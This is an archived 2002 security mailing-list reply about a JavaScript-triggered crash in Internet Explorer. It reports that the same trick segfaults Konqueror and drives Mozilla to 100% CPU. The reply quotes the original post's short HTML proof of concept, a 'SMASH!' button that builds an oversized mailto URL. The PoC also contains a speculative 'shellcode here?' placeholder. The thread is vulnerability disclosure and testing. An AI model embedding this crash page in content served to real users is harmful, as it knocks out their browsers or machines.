Re: Buffer Overflow with all versions of Internet Explorer and Javacript.

From: Scott Mackenzie (smackenzat_private)
Date: Sun Jun 02 2002 - 16:47:52 PDT

Next message: Muhammad Faisal Rauf Danka: "Re: Verizon Call Intercept"

Previous message: 3APA3A: "SECURITY.NNOV: Courier CPU exhaustion + bonus on imap-uw"
In reply to: Matias Sedalo: "Buffer Overflow with all versions of Internet Explorer and Javacript."
Next in thread: Jacek Lach: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
Next in thread: Gian Fabio Palmerini: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
Reply: Jacek Lach: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

After a few minutes testing it seems this does not only effect Internet
Explorer but also the following browsers:


In KDE's konqueror Latest Version it Seg Faults the browser instantly

In Mozilla 0.99 it causes a Denial of Service situation against the
machine with 100% CPU usage, and some crazy hard drive accessing until
the process is killed

Other information:

Netscape 6 series latest version does nothing when SMASH! is clicked

Galeon latest tries to mail a rather long email address, but the browser
itself is un-effected


Test System:
Linux Redhat 7.3 2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686 


---------------------------------
Scott Mackenzie
Cybernetics & Virtual Worlds (2)
Bradford University
http://smackenz.zapto.org
---------------------------------


On Sun, 2002-06-02 at 22:08, Matias Sedalo wrote:
> the 28/07/1999 I have discovered a stack buffer overflow caused by until
> the moment all the versions of the Internet Explorer.
> In many windows98 causes the necessity to reinitiate the equipment, since
> to my to seem it remains without memory.
> Only it has been proven in several versions 5 of IE on WindowsNT
> server sp6 and windows98 Second Edition.  As I said before the Windows 98
> I had to reinitiate it to the force.
> Can be possible to execute arbitrary code using the variable company of
> the example?
> 
> // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
> // internet Explorer 5.00.3500.1003 on Windows98se
> 
> -----------cut here---------------------------
> <html><head></head>
> <script language="JAVASCRIPT">
> function hacerMail() {
>   var company;
> 
>   crear();
>   address="s0t4ipv6at_private";
>   soporte();
> }
> function soporte(){
>   var soporte="billat_private";
>   window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
> // window.location=company;             // also this line cause the bof.
>   close(hacerMail());
> }
> function crear(){
> company="shellcode here?\n";            // i don't think so.
> }
> </script>
>   <input type="button" onClick="hacerMail();" value="SMASH!"></input>
> </html>
> -----------cut here---------------------------
> 
> Regards.
> 
> - Internet es perjudicial para la salud -
> - Ley N~ 127.0.0.1
> 
> Matias Sedalo 	
> http://www.shellcode.com.ar
> 
> s0t4ipv6at_private
> B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
> .......................................
> 
> 
> 
>

Next message: Muhammad Faisal Rauf Danka: "Re: Verizon Call Intercept"
Previous message: 3APA3A: "SECURITY.NNOV: Courier CPU exhaustion + bonus on imap-uw"
In reply to: Matias Sedalo: "Buffer Overflow with all versions of Internet Explorer and Javacript."
Next in thread: Jacek Lach: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
Next in thread: Gian Fabio Palmerini: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
Reply: Jacek Lach: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jun 02 2002 - 17:30:23 PDT